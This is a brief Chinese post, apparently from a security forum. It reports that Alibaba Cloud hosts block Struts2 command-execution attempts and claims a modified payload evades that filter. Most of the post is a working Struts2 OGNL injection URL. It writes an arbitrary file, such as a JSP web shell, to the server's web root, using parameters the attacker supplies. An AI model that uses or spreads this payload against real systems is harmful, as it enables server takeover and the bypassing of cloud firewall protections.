测试了下阿里云主机，似乎默认带了Struts2命令执行和Getshell的拦截。改了下就不拦了撒。

http://xxx.com/test.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p%3d%23req.getRealPath(%22/%22)%2b%23req.getParameter(%22f%22),%23s%3dnew+java.io.RandomAccessFile(%23p,%22rw%22),%23s.write(%23req.getParameter(%22c%22).getBytes()),%23s.close()}&f=文件.jsp&c=内容